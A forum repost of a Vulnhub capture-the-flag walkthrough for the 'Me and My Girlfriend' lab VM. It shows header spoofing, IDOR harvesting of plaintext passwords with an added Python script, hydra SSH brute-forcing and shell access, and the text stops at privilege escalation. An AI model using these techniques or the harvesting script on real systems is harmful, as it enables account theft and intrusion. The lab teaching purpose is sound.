ToB Enterprise Service Application Market: ToB review and business social industry platform

Title: Detailed walkthrough of Vulnhub's Me and My Girlfriend

Author: 惊雷无声    Time: 2023-4-9 15:06
Me and My Girlfriend

Author: jason huawen
Target machine information

Name: Me and My Girlfriend: 1
Address:
  https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
Identifying the target host's IP address
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
  Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

  3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
  _____________________________________________________________________________
     IP            At MAC Address     Count     Len  MAC Vendor / Hostname
  -----------------------------------------------------------------------------
  192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor
  192.168.56.100  08:00:27:61:8a:f1      1      60  PCS Systemtechnik GmbH
  192.168.56.254  08:00:27:87:26:b3      1      60  PCS Systemtechnik GmbH
Using Kali Linux's netdiscover tool, the target host's IP address is identified as 192.168.56.254.
NMAP scan
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
  Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-08 20:16 EDT
  Nmap scan report for www.armour.local (192.168.56.254)
  Host is up (0.000071s latency).
  Not shown: 65533 closed tcp ports (reset)
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey:
  |   1024 57e15658460433563dc34ba793ee2316 (DSA)
  |   2048 3b264de4a03bf875d96e1555828c7197 (RSA)
  |   256 8f48979b55115bf16c1db34abc36bdb0 (ECDSA)
  |_  256 d0c302a1c4c2a8ac3b84ae8fe5796676 (ED25519)
  80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
  |_http-title: Site doesn't have a title (text/html).
  |_http-server-header: Apache/2.4.7 (Ubuntu)
  MAC Address: 08:00:27:87:26:B3 (Oracle VirtualBox virtual NIC)
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 8.87 seconds
The NMAP scan shows the target has two open ports: 22 (ssh) and 80 (http).
Getting a shell
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ curl http://192.168.56.254
  Who are you? Hacker? Sorry This Site Can Only Be Accessed local!
The site claims to be accessible only locally, and the hint is to set x-forwarded-for in the request header. Because the server decides what counts as "local" from a header the client supplies, any request carrying that header with the value 127.0.0.1 passes the check.
Intercept the request with Burp Suite and add the header x-forwarded-for: 127.0.0.1.
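As an added illustration (this is not code from the walkthrough, and the VM's own PHP source is not shown on the page), here is the server-side mistake behind this bypass next to a corrected check, written in Python with a constructed request object. The proxy address 10.0.0.5 is an assumption, used only to show the one situation in which X-Forwarded-For may legitimately be consulted: when the TCP peer is a reverse proxy you operate.

```python
from dataclasses import dataclass, field

LOCAL_ADDRS = {"127.0.0.1", "::1"}


@dataclass
class Request:
    """Minimal stand-in for a server-side request object (constructed for this example)."""
    remote_addr: str                                 # TCP peer address, set by the server's socket layer
    headers: dict = field(default_factory=dict)      # every header is attacker-controlled


def is_local_vulnerable(req: Request) -> bool:
    """The kind of check the target appears to use: if X-Forwarded-For is present,
    believe it over the real peer address. Anyone can send that header."""
    xff = req.headers.get("X-Forwarded-For")
    client_ip = xff.split(",")[0].strip() if xff else req.remote_addr
    return client_ip in LOCAL_ADDRS


def real_client_ip(req: Request, trusted_proxies: frozenset = frozenset()) -> str:
    """Resolve the client address, honouring X-Forwarded-For only for hops that
    were appended by proxies we operate. Proxies append the peer they saw, so the
    list is walked right to left and the first non-proxy entry is the client."""
    if req.remote_addr not in trusted_proxies:
        return req.remote_addr           # direct connection: the socket address is the truth
    hops = [h.strip() for h in req.headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in trusted_proxies:
            return hop                   # first address not added by one of our own proxies
    return req.remote_addr               # header empty or lists only proxies


def is_local_fixed(req: Request, trusted_proxies: frozenset = frozenset()) -> bool:
    """Local-only gate that a client-supplied header cannot bypass."""
    return real_client_ip(req, trusted_proxies) in LOCAL_ADDRS


if __name__ == "__main__":
    spoofed = Request("192.168.56.1", {"X-Forwarded-For": "127.0.0.1"})
    print("vulnerable check lets the spoofed request in:", is_local_vulnerable(spoofed))
    print("fixed check lets the spoofed request in:     ", is_local_fixed(spoofed))
```

The spoofed request is exactly what the Burp Suite step sends: a connection from 192.168.56.1 carrying X-Forwarded-For: 127.0.0.1. The vulnerable check accepts it; the fixed check only ever looks at the header when the connection itself comes from a known proxy, and even then it takes the hop the proxy appended, not the one the attacker typed.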
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ curl http://192.168.56.254/robots.txt
  User-Agent: *
  Allow: /heyhoo.txt

  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ curl http://192.168.56.254/heyhoo.txt
  Great! What you need now is reconn, attack and got the shell

At this point the page is returned successfully.
Modifying every request in Burp Suite is tedious; a browser extension that rewrites the X-Forwarded-For header can be used instead.
Judging by the URL, could there be a local file inclusion vulnerability?
  http://192.168.56.254/index.php?page=login
After testing, however, nothing was returned, but no error either.
The PHP filter wrapper did not work either:
  http://192.168.56.254/index.php?page=php://filter/convert.base64-encode/resource=index
Intercept the request with Burp Suite, save it to a file, and scan it with sqlmap to check for SQL injection:
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ sqlmap -r req.txt --level=5
sqlmap found no SQL injection vulnerability.
Next, register a user named test and see what turns up. After logging in as test,
note the URL:
  http://192.168.56.254/index.php?page=dashboard&user_id=14
Let's see whether we can move horizontally to other users' data by changing the user_id value.
With user_id changed to 1, view the profile.
Looking at the page source at this point, the user's plaintext password is right there:
  <!DOCTYPE html>
  <html lang="en">
  <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta http-equiv="X-UA-Compatible" content="ie=edge">
      <title>Ceban Corp</title>

  </head>
  <body>

          <h2>Welcome To Ceban Corp</h2>
          <p>Inspiring The People To Great Again!</p>
          <hr>
                  <p><a target="_blank" href="https://www.cnblogs.com/?page=dashboard">Dashboard</a> | <a target="_blank" href="https://www.cnblogs.com/?page=profile&user_id=14">Profile</a> | <a target="_blank" href="https://www.cnblogs.com/?page=logout">Logout</a></p>
                  <hr>

      <form action="#" method="POST">
      <label for="name">Name</label>
      <input type="text" name="name" id="name" value="Eweuh Tandingan"><br>
      <label for="username">Username</label>
      <input type="text" name="username" id="username" value="eweuhtandingan"><br>
      <label for="password">Password</label>
      <input type="password" name="password" id="password" value="skuyatuh"><br>
      <button disabled="disabled">Change</button>
  </form>
  </body>
  </html>
Are this username and password also the SSH credentials? They are not, so instead collect every user's username and password (i.e. enumerate user_id from 1 upward until the page returns nothing):
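The enumeration just described, automated as an added example (this script is mine, not part of the original walkthrough): it sends the spoofed X-Forwarded-For header on every request, pulls the three form values out of each profile page, walks user_id upward until several consecutive ids return no form, and turns the result into the users/passwords lists that the hydra step below consumes. The profile URL shape is taken from the Profile link in the page source above; the session cookie name PHPSESSID is an assumption (PHP's default), and you must still log in as the test account first and copy that cookie. The SAMPLE_PAGES dictionary is constructed for an offline run; id 1 mirrors the form seen on the page, id 2 is made up.

```python
import sys
import urllib.request
from html.parser import HTMLParser

PROFILE_FIELDS = ("name", "username", "password")


class _ProfileForm(HTMLParser):
    """Collects the value attributes of the three inputs in the profile form."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = dict(attrs)
        if a.get("name") in PROFILE_FIELDS:
            self.fields[a["name"]] = a.get("value") or ""


def parse_profile(html):
    """Return {'name', 'username', 'password'} from a profile page, or None
    when the page carries no populated form (an unused user_id)."""
    p = _ProfileForm()
    p.feed(html)
    if all(f in p.fields for f in PROFILE_FIELDS):
        return p.fields
    return None


def make_xff_fetch(base_url, session_cookie, spoof_ip="127.0.0.1"):
    """Build a fetcher that spoofs X-Forwarded-For on every request and sends the
    logged-in session cookie. PHPSESSID is an assumption (PHP's default cookie name)."""
    def fetch(user_id):
        url = f"{base_url}/index.php?page=profile&user_id={user_id}"
        req = urllib.request.Request(url, headers={
            "X-Forwarded-For": spoof_ip,
            "Cookie": f"PHPSESSID={session_cookie}",
        })
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


def harvest(fetch, start=1, stop_after=3):
    """Walk user_id upward; stop after `stop_after` consecutive ids with no form."""
    found, misses, uid = [], 0, start
    while misses < stop_after:
        rec = parse_profile(fetch(uid))
        if rec is None:
            misses += 1
        else:
            misses = 0
            found.append((uid, rec))
        uid += 1
    return found


def to_wordlists(records):
    """Split harvested records into the users / passwords lists hydra expects."""
    users = [r["username"] for _, r in records]
    passwords = [r["password"] for _, r in records]
    return users, passwords


# Constructed sample pages for an offline run (see lead-in); ids beyond 2 return a page with no form.
SAMPLE_PAGES = {
    1: '<form action="#" method="POST"><input type="text" name="name" value="Eweuh Tandingan">'
       '<input type="text" name="username" value="eweuhtandingan">'
       '<input type="password" name="password" value="skuyatuh"></form>',
    2: '<form action="#" method="POST"><input type="text" name="name" value="Example User">'
       '<input type="text" name="username" value="example">'
       '<input type="password" name="password" value="ex4mple"></form>',
}


def sample_fetch(user_id):
    return SAMPLE_PAGES.get(user_id, "<html><body><h2>Welcome To Ceban Corp</h2></body></html>")


if __name__ == "__main__":
    # usage: python3 idor_harvest.py http://192.168.56.254 <PHPSESSID value>   (no args: offline demo)
    fetch = make_xff_fetch(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else sample_fetch
    records = harvest(fetch)
    for uid, rec in records:
        print(f"user_id={uid}: {rec['username']}:{rec['password']} ({rec['name']})")
    users, passwords = to_wordlists(records)
    print("users.dict:", *users, sep="\n")
    print("pass.dict:", *passwords, sep="\n")
```

Stopping after a run of empty ids rather than at the first one matters because deleted accounts leave holes in the id sequence; the author's own test user got id 14 while only a handful of real accounts exist. The vulnerability being exploited is the missing server-side check that the requested user_id belongs to the logged-in session; the plaintext password in the form is a second, independent failure.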
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ ssh eweuhtandingan@192.168.56.254
  The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
  ED25519 key fingerprint is SHA256:xQf3lfh03E3NNnt5rN/N5zVlGxJJo8QcKykWWCSg1SM.
  This key is not known by any other names.
  Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
  eweuhtandingan@192.168.56.254's password:
  Permission denied, please try again.
  eweuhtandingan@192.168.56.254's password:
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ cat users.dict
  eweuhtandingan
  aingmaung
  sundatea
  sedihaingmah
  alice

  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ cat pass.dict
  skuyatuh
  qwerty!!!
  indONEsia
  cedihhihihi
  4lic3
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ hydra -L users.dict -P pass.dict ssh://192.168.56.254
  Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-08 21:09:16
  [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
  [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
  [DATA] attacking ssh://192.168.56.254:22/
  [22][ssh] host: 192.168.56.254   login: alice   password: 4lic3
  1 of 1 target successfully completed, 1 valid password found
  [WARNING] Writing restore file because 2 final worker threads did not complete until end.
  [ERROR] 2 targets did not resolve or could not be connected
  [ERROR] 0 target did not complete
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-08 21:09:20
  ┌──(kali㉿kali)-[~/Vulnhub/Me_And_Mygirlfriend]
  └─$ ssh alice@192.168.56.254
  alice@192.168.56.254's password:
  Last login: Fri Dec 13 14:48:25 2019
  alice@gfriEND:~$ id
  uid=1000(alice) gid=1001(alice) groups=1001(alice)
  alice@gfriEND:~$ ls -alh
  total 32K
  drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 .
  drwxr-xr-x 6 root  root  4.0K Dec 13  2019 ..
  -rw------- 1 alice alice   10 Dec 13  2019 .bash_history
  -rw-r--r-- 1 alice alice  220 Dec 13  2019 .bash_logout
  -rw-r--r-- 1 alice alice 3.6K Dec 13  2019 .bashrc
  drwx------ 2 alice alice 4.0K Dec 13  2019 .cache
  drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .my_secret
  -rw-r--r-- 1 alice alice  675 Dec 13  2019 .profile
  alice@gfriEND:~$ cat .bash_history
  exit
  exit
  alice@gfriEND:~$ cd .my_secret/
  alice@gfriEND:~/.my_secret$ ls -alh
  total 16K
  drwxrwxr-x 2 alice alice 4.0K Dec 13  2019 .
  drwxr-xr-x 4 alice alice 4.0K Dec 13  2019 ..
  -rw-r--r-- 1 root  root   306 Dec 13  2019 flag1.txt
  -rw-rw-r-- 1 alice alice  119 Dec 13  2019 my_notes.txt
  alice@gfriEND:~/.my_secret$ cat flag1.txt
  Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!
  Now your last job is get access to the root and read the flag ^_^
  Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
  alice@gfriEND:~/.my_secret$ cat my_notes.txt
  Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn't know my notes
  alice@gfriEND:~/.my_secret$ cd /home
  alice@gfriEND:/home$ ls -alh
  total 24K
  drwxr-xr-x  6 root           root           4.0K Dec 13  2019 .
  drwxr-xr-x 22 root           root           4.0K Dec 13  2019 ..
  drwxr-xr-x  2 aingmaung      aingmaung      4.0K Dec 13  2019 aingmaung
  drwxr-xr-x  4 alice          alice          4.0K Dec 13  2019 alice
  drwxr-xr-x  2 eweuhtandingan eweuhtandingan 4.0K Dec 13  2019 eweuhtandingan
  drwxr-xr-x  2 sundatea       sundatea       4.0K Dec 13  2019 sundatea
At this point we have the first flag.
Privilege escalation

  alice@gfriEND:/var/www/html$ cd config
  alice@gfriEND:/var/www/html/config$ ls -alh
  total 12K
  drwxrwxr-x 2 root root 4.0K Dec 13  2019 .
  drwxr-xr-x 5 root root 4.0K Dec 13  2019 ..
  -rw-rw-r-- 1 root root   88 Dec 13  2019 config.php
  alice@gfriEND:/var/www/html/config$ cat config.php



